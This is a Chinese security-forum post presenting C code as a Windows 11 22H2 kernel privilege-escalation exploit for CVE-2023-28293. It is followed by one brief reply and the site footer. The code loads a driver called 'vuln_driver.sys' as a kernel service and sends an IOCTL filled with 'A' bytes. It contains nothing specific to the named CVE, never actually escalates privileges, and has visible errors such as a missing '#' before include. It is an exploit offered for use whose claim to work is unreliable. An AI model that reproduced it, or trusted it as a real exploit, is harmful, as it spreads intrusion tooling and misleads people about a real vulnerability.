查看: 12683|回复: 1

Windows 11 22h2-内核特权提升漏洞

[复制链接]
  • TA的每日心情

    7 天前
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2023-7-10 08:28:08 | 显示全部楼层 |阅读模式
    CVE : CVE-2023-28293

    [AppleScript] 纯文本查看 复制代码
    include <windows.h>
    #include <stdio.h>
      
    // The vulnerable driver file name
    const char *driver_name = "vuln_driver.sys";
      
    // The vulnerable driver device name
    const char *device_name = "\\\\.\\VulnDriver";
      
    // The IOCTL code to trigger the vulnerability
    #define IOCTL_VULN_CODE 0x222003
      
    // The buffer size for the IOCTL input/output data
    #define IOCTL_BUFFER_SIZE 0x1000
      
    int main()
    {
        HANDLE device;
        DWORD bytes_returned;
        char input_buffer[IOCTL_BUFFER_SIZE];
        char output_buffer[IOCTL_BUFFER_SIZE];
      
        // Load the vulnerable driver
        if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
        {
            printf("Error loading vulnerable driver: %d\n", GetLastError());
            return 1;
        }
      
        // Open the vulnerable driver device
        device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        if (device == INVALID_HANDLE_VALUE)
        {
            printf("Error opening vulnerable driver device: %d\n", GetLastError());
            return 1;
        }
      
        // Fill the input buffer with data to trigger the vulnerability
        memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);
      
        // Send the IOCTL to trigger the vulnerability
        if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
        {
            printf("Error sending IOCTL: %d\n", GetLastError());
            return 1;
        }
      
        // Print the output buffer contents
        printf("Output buffer:\n%s\n", output_buffer);
      
        // Unload the vulnerable driver
        if (!UnloadDriver("\\Driver\\VulnDriver"))
        {
            printf("Error unloading vulnerable driver: %d\n", GetLastError());
            return 1;
        }
      
        // Close the vulnerable driver device
        CloseHandle(device);
      
        return 0;
    }
      
    BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
    {
        SC_HANDLE sc_manager, service;
        DWORD error;
      
        // Open the Service Control Manager
        sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
        if (sc_manager == NULL)
        {
            return FALSE;
        }
      
        // Create the service
        service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
        if (service == NULL)
        {
            error = GetLastError();
            if (error == ERROR_SERVICE_EXISTS)
            {
                // The service already exists, so open it instead
                service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
                if (service == NULL)
                {
                    CloseServiceHandle(sc_manager);
                    return FALSE;
                }
            }
            else
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
      
        // Start the service
        if (!StartService(service, 0, NULL))
        {
            error = GetLastError();
            if (error != ERROR_SERVICE_ALREADY_RUNNING)
            {
                CloseServiceHandle(service);
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
      
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return TRUE;
    }
      
    BOOL UnloadDriver(LPCTSTR service_name)
    {
        SC_HANDLE sc_manager, service;
        SERVICE_STATUS status;
        DWORD error;
      
        // Open the Service Control Manager
        sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
        if (sc_manager == NULL)
        {
            return FALSE;
        }
      
        // Open the service
        service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
        if (service == NULL)
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
      
        // Stop the service
        if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
        {
            error = GetLastError();
            if (error != ERROR_SERVICE_NOT_ACTIVE)
            {
                CloseServiceHandle(service);
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
      
        // Delete the service
        if (!DeleteService(service))
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
      
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return TRUE;
    }
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2023-11-7 16:13
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2023-7-17 18:24:31 | 显示全部楼层
    看看怎么样!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-21 22:18 , Processed in 0.029220 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部